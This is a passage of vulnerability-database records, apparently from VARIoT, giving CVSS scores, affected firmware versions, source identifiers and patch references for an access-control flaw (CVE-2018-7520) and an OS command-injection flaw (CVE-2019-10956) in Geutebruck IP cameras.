"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "CNVD-2018-06020",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "IVD",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "e2e8f6e2-39ab-11e9-b0e9-000c29342cb1",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.2,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.9 [IVD]"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "VHN-137552",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:P/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"id": "CVE-2018-7520",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 9.8,
"baseSeverity": "Critical",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2018-7520",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2018-7520",
"trust": 1.0,
"value": "CRITICAL"
},
{
"author": "NVD",
"id": "CVE-2018-7520",
"trust": 0.8,
"value": "Critical"
},
{
"author": "CNVD",
"id": "CNVD-2018-06020",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201803-764",
"trust": 0.6,
"value": "CRITICAL"
},
{
"author": "IVD",
"id": "e2e8f6e2-39ab-11e9-b0e9-000c29342cb1",
"trust": 0.2,
"value": "CRITICAL"
},
{
"author": "VULHUB",
"id": "VHN-137552",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "IVD",
"id": "e2e8f6e2-39ab-11e9-b0e9-000c29342cb1"
},
{
"db": "CNVD",
"id": "CNVD-2018-06020"
},
{
"db": "VULHUB",
"id": "VHN-137552"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-003343"
},
{
"db": "CNNVD",
"id": "CNNVD-201803-764"
},
{
"db": "NVD",
"id": "CVE-2018-7520"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "An improper access control vulnerability has been identified in Geutebruck G-Cam/EFD-2250 Version 1.12.0.4 and Topline TopFD-2125 Version 3.15.1 IP cameras, which could allow a full configuration download, including passwords. Geutebruck G-Cam/EFD-2250 and Topline TopFD-2125 Contains an access control vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. The G-Cam/EFD-2250 and ToplineTopFD-2125 are both high-definition cameras from Geutebruck. Multiple Geutebruck devices are prone to the following multiple security vulnerabilities. \n1. An authentication-bypass vulnerability\n2. A SQL-injection vulnerability\n3. A cross-site request-forgery vulnerability\n4. An access-bypass vulnerability\n5. A security-bypass vulnerability\n6. A cross-site scripting vulnerability\nAttackers may exploit these issues to gain unauthorized access to the affected device, or to bypass certain security restrictions to perform unauthorized actions, to compromise the application to access or modify data and to exploit vulnerabilities in the underlying database, to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site or to execute arbitrary code within the context of the affected device. \nThe following devices are vulnerable:\nGeutebruck G-Cam/EFD-2250 version 1.12.0.4\nGeutebruck Topline TopFD-2125 version 3.15.1. Geutebr\u00fcck G-Cam/EFD-2250 and Topline TopFD-2125 are IP camera products of German Geutebr\u00fcck company",
"sources": [
{
"db": "NVD",
"id": "CVE-2018-7520"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-003343"
},
{
"db": "CNVD",
"id": "CNVD-2018-06020"
},
{
"db": "BID",
"id": "103474"
},
{
"db": "IVD",
"id": "e2e8f6e2-39ab-11e9-b0e9-000c29342cb1"
},
{
"db": "VULHUB",
"id": "VHN-137552"
}
],
"trust": 2.7
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-137552",
"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-137552"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2018-7520",
"trust": 3.6
},
{
"db": "ICS CERT",
"id": "ICSA-18-079-01",
"trust": 3.4
},
{
"db": "BID",
"id": "103474",
"trust": 2.0
},
{
"db": "CNNVD",
"id": "CNNVD-201803-764",
"trust": 0.9
},
{
"db": "CNVD",
"id": "CNVD-2018-06020",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2018-003343",
"trust": 0.8
},
{
"db": "IVD",
"id": "E2E8F6E2-39AB-11E9-B0E9-000C29342CB1",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "148380",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-137552",
"trust": 0.1
}
],
"sources": [
{
"db": "IVD",
"id": "e2e8f6e2-39ab-11e9-b0e9-000c29342cb1"
},
{
"db": "CNVD",
"id": "CNVD-2018-06020"
},
{
"db": "VULHUB",
"id": "VHN-137552"
},
{
"db": "BID",
"id": "103474"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-003343"
},
{
"db": "CNNVD",
"id": "CNNVD-201803-764"
},
{
"db": "NVD",
"id": "CVE-2018-7520"
}
]
},
"id": "VAR-201803-2213",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "IVD",
"id": "e2e8f6e2-39ab-11e9-b0e9-000c29342cb1"
},
{
"db": "CNVD",
"id": "CNVD-2018-06020"
},
{
"db": "VULHUB",
"id": "VHN-137552"
}
],
"trust": 1.7456349166666667
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"IoT",
"ICS",
"Network device"
],
"sub_category": null,
"trust": 0.6
},
{
"category": [
"ICS"
],
"sub_category": null,
"trust": 0.2
}
],
"sources": [
{
"db": "IVD",
"id": "e2e8f6e2-39ab-11e9-b0e9-000c29342cb1"
},
{
"db": "CNVD",
"id": "CNVD-2018-06020"
}
]
},
"last_update_date": "2024-11-23T21:53:17.617000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "https://www.geutebrueck.com/en_EN.html"
},
{
"title": "GeutebruckIPCameras patch for incorrect access control vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/122845"
},
{
"title": "Geutebr\u00fcck G-Cam/EFD-2250 and Topline TopFD-2125 Fixes for access control error vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=79350"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-06020"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-003343"
},
{
"db": "CNNVD",
"id": "CNNVD-201803-764"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-284",
"trust": 1.9
},
{
"problemtype": "NVD-CWE-Other",
"trust": 1.0
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-137552"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-003343"
},
{
"db": "NVD",
"id": "CVE-2018-7520"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 3.4,
"url": "https://ics-cert.us-cert.gov/advisories/icsa-18-079-01"
},
{
"trust": 1.7,
"url": "http://www.securityfocus.com/bid/103474"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-7520"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-7520"
},
{
"trust": 0.3,
"url": "http://www.geutebrueck.com/en_en/product-overview-31934.html"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-06020"
},
{
"db": "VULHUB",
"id": "VHN-137552"
},
{
"db": "BID",
"id": "103474"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-003343"
},
{
"db": "CNNVD",
"id": "CNNVD-201803-764"
},
{
"db": "NVD",
"id": "CVE-2018-7520"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "IVD",
"id": "e2e8f6e2-39ab-11e9-b0e9-000c29342cb1"
},
{
"db": "CNVD",
"id": "CNVD-2018-06020"
},
{
"db": "VULHUB",
"id": "VHN-137552"
},
{
"db": "BID",
"id": "103474"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-003343"
},
{
"db": "CNNVD",
"id": "CNNVD-201803-764"
},
{
"db": "NVD",
"id": "CVE-2018-7520"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-03-22T00:00:00",
"db": "IVD",
"id": "e2e8f6e2-39ab-11e9-b0e9-000c29342cb1"
},
{
"date": "2018-03-22T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-06020"
},
{
"date": "2018-03-22T00:00:00",
"db": "VULHUB",
"id": "VHN-137552"
},
{
"date": "2018-03-20T00:00:00",
"db": "BID",
"id": "103474"
},
{
"date": "2018-05-22T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-003343"
},
{
"date": "2018-03-22T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201803-764"
},
{
"date": "2018-03-22T18:29:00.963000",
"db": "NVD",
"id": "CVE-2018-7520"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-03-22T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-06020"
},
{
"date": "2020-10-02T00:00:00",
"db": "VULHUB",
"id": "VHN-137552"
},
{
"date": "2018-03-20T00:00:00",
"db": "BID",
"id": "103474"
},
{
"date": "2018-05-22T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-003343"
},
{
"date": "2020-10-09T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201803-764"
},
{
"date": "2024-11-21T04:12:17.273000",
"db": "NVD",
"id": "CVE-2018-7520"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201803-764"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Geutebruck IP Cameras Incorrect access control vulnerability",
"sources": [
{
"db": "IVD",
"id": "e2e8f6e2-39ab-11e9-b0e9-000c29342cb1"
},
{
"db": "CNVD",
"id": "CNVD-2018-06020"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "other",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201803-764"
}
],
"trust": 0.6
}
}
VAR-202001-1487
Vulnerability from variot - Updated: 2024-11-23 21:51Geutebruck IP Cameras G-Code(EEC-2xxx), G-Cam(EBC-21xx/EFD-22xx/ETHC-22xx/EWPC-22xx): All versions 1.12.0.25 and prior may allow a remote authenticated user, using a specially crafted URL command, to execute commands as root. Geutebruck IP Camera G-Code and G-Cam In OS A command injection vulnerability exists.Information is acquired, information is falsified, and denial of service (DoS) May be in a state. G-Cam is a web camera series launched by Geutebrück. G-Code is an analog video encoder launched by Geutebrück.
Geutebrück G-Cam and G-Code have OS command injection vulnerabilities. The vulnerability stems from the fact that external input data constructs executable commands for the operating system, and the network system or product does not properly filter special characters and commands. Attackers can use this vulnerability to execute illegal operating system commands. Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user and inject and execute arbitrary commands. Other attacks are also possible. The following products of Geutebruck are affected: G-Code EEC-2xxx version 1.12.0.25 and prior G-Cam EBC-21xx version 1.12.0.25 and prior G-Cam EFD-22xx version 1.12.0.25 and prior G-Cam ETHC-22xx version 1.12.0.25 and prior G-Cam EWPC-22xx version 1.12.0.25 and prior
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202001-1487",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "g-code eec-2400",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.25"
},
{
"model": "g-cam ebc-2110",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.25"
},
{
"model": "g-cam efd-2241",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.25"
},
{
"model": "g-cam ethc-2249",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.25"
},
{
"model": "g-cam ethc-2239",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.25"
},
{
"model": "g-cam ebc-2111",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.25"
},
{
"model": "g-cam efd-2250",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.25"
},
{
"model": "g-cam ethc-2240",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.25"
},
{
"model": "g-cam ewpc-2270",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.25"
},
{
"model": "g-cam efd-2240",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.25"
},
{
"model": "g-cam ethc-2230",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.25"
},
{
"model": "g-cam/ebc-2110",
"scope": "lt",
"trust": 0.8,
"vendor": "geutebruck",
"version": "1.12.0.25"
},
{
"model": "g-cam/ebc-2111",
"scope": "lt",
"trust": 0.8,
"vendor": "geutebruck",
"version": "1.12.0.25"
},
{
"model": "g-cam/efd-2240",
"scope": "lt",
"trust": 0.8,
"vendor": "geutebruck",
"version": "1.12.0.25"
},
{
"model": "g-cam/efd-2241",
"scope": "lt",
"trust": 0.8,
"vendor": "geutebruck",
"version": "1.12.0.25"
},
{
"model": "g-cam/efd-2250",
"scope": "lt",
"trust": 0.8,
"vendor": "geutebruck",
"version": "1.12.0.25"
},
{
"model": "g-cam/ethc-2230",
"scope": "lt",
"trust": 0.8,
"vendor": "geutebruck",
"version": "1.12.0.25"
},
{
"model": "g-cam/ethc-2239",
"scope": "lt",
"trust": 0.8,
"vendor": "geutebruck",
"version": "1.12.0.25"
},
{
"model": "g-cam/ethc-2240",
"scope": "lt",
"trust": 0.8,
"vendor": "geutebruck",
"version": "1.12.0.25"
},
{
"model": "g-cam/ethc-2249",
"scope": "lt",
"trust": 0.8,
"vendor": "geutebruck",
"version": "1.12.0.25"
},
{
"model": "g-code/eec-2400",
"scope": "lt",
"trust": 0.8,
"vendor": "geutebruck",
"version": "1.12.0.25"
},
{
"model": "g-cam",
"scope": "lte",
"trust": 0.6,
"vendor": "geutebruck",
"version": "\u003c=1.12.0.25"
},
{
"model": "g-code",
"scope": "lte",
"trust": 0.6,
"vendor": "geutebruck",
"version": "\u003c=1.12.0.25"
},
{
"model": "g-code/eec-2xxx",
"scope": "eq",
"trust": 0.3,
"vendor": "geutebruck",
"version": "1.12.0.25"
},
{
"model": "g-cam/ewpc-22xx",
"scope": "eq",
"trust": 0.3,
"vendor": "geutebruck",
"version": "1.12.0.25"
},
{
"model": "g-cam/ethc-22xx",
"scope": "eq",
"trust": 0.3,
"vendor": "geutebruck",
"version": "1.12.0.25"
},
{
"model": "g-cam/efd-22xx",
"scope": "eq",
"trust": 0.3,
"vendor": "geutebruck",
"version": "1.12.0.25"
},
{
"model": "g-cam/ebc-21xx",
"scope": "eq",
"trust": 0.3,
"vendor": "geutebruck",
"version": "1.12.0.25"
},
{
"model": "g-code/eec-2xxx",
"scope": "ne",
"trust": 0.3,
"vendor": "geutebruck",
"version": "1.12.13.2"
},
{
"model": "g-cam/ewpc-22xx",
"scope": "ne",
"trust": 0.3,
"vendor": "geutebruck",
"version": "1.12.13.2"
},
{
"model": "g-cam/ethc-22xx",
"scope": "ne",
"trust": 0.3,
"vendor": "geutebruck",
"version": "1.12.13.2"
},
{
"model": "g-cam/efd-22xx",
"scope": "ne",
"trust": 0.3,
"vendor": "geutebruck",
"version": "1.12.13.2"
},
{
"model": "g-cam/ebc-21xx",
"scope": "ne",
"trust": 0.3,
"vendor": "geutebruck",
"version": "1.12.13.2"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-22346"
},
{
"db": "BID",
"id": "108579"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-014194"
},
{
"db": "NVD",
"id": "CVE-2019-10956"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:geutebruck:g-cam_ebc-2110_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:geutebruck:g-cam_ebc-2111_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:geutebruck:g-cam_efd-2240_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:geutebruck:g-cam_efd-2241_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:geutebruck:g-cam%2fefd-2250_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:geutebruck:g-cam_ethc-2230_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:geutebruck:g-cam_ethc-2239_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:geutebruck:g-cam_ethc-2240_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:geutebruck:g-cam_ethc-2249_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:geutebruck:g-code_eec-2400_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-014194"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Romain Luyer and Guillaume Gronnier from CEIS, and Davy Douhine from RandoriSec reported these vulnerabilities to NCCIC., and Davy Douhine from RandoriSec, and Davy Douhine from RandoriSec.",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201906-088"
}
],
"trust": 0.6
},
"cve": "CVE-2019-10956",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "nvd@nist.gov",
"availabilityImpact": "COMPLETE",
"baseScore": 9.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 8.0,
"id": "CVE-2019-10956",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 1.9,
"vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "CNVD",
"availabilityImpact": "COMPLETE",
"baseScore": 9.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 8.0,
"id": "CNVD-2020-22346",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 7.2,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 1.2,
"id": "CVE-2019-10956",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 7.2,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2019-10956",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "High",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2019-10956",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "CVE-2019-10956",
"trust": 0.8,
"value": "High"
},
{
"author": "CNVD",
"id": "CNVD-2020-22346",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201906-088",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULMON",
"id": "CVE-2019-10956",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-22346"
},
{
"db": "VULMON",
"id": "CVE-2019-10956"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-014194"
},
{
"db": "CNNVD",
"id": "CNNVD-201906-088"
},
{
"db": "NVD",
"id": "CVE-2019-10956"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Geutebruck IP Cameras G-Code(EEC-2xxx), G-Cam(EBC-21xx/EFD-22xx/ETHC-22xx/EWPC-22xx): All versions 1.12.0.25 and prior may allow a remote authenticated user, using a specially crafted URL command, to execute commands as root. Geutebruck IP Camera G-Code and G-Cam In OS A command injection vulnerability exists.Information is acquired, information is falsified, and denial of service (DoS) May be in a state. G-Cam is a web camera series launched by Geutebr\u00fcck. G-Code is an analog video encoder launched by Geutebr\u00fcck. \n\r\n\r\nGeutebr\u00fcck G-Cam and G-Code have OS command injection vulnerabilities. The vulnerability stems from the fact that external input data constructs executable commands for the operating system, and the network system or product does not properly filter special characters and commands. Attackers can use this vulnerability to execute illegal operating system commands. \nSuccessful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user and inject and execute arbitrary commands. Other attacks are also possible. \nThe following products of Geutebruck are affected:\nG-Code EEC-2xxx version 1.12.0.25 and prior\nG-Cam EBC-21xx version 1.12.0.25 and prior\nG-Cam EFD-22xx version 1.12.0.25 and prior\nG-Cam ETHC-22xx version 1.12.0.25 and prior\nG-Cam EWPC-22xx version 1.12.0.25 and prior",
"sources": [
{
"db": "NVD",
"id": "CVE-2019-10956"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-014194"
},
{
"db": "CNVD",
"id": "CNVD-2020-22346"
},
{
"db": "BID",
"id": "108579"
},
{
"db": "VULMON",
"id": "CVE-2019-10956"
}
],
"trust": 2.52
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "ICS CERT",
"id": "ICSA-19-155-03",
"trust": 3.4
},
{
"db": "NVD",
"id": "CVE-2019-10956",
"trust": 3.4
},
{
"db": "BID",
"id": "108579",
"trust": 1.0
},
{
"db": "JVNDB",
"id": "JVNDB-2019-014194",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2020-22346",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201906-088",
"trust": 0.6
},
{
"db": "VULMON",
"id": "CVE-2019-10956",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-22346"
},
{
"db": "VULMON",
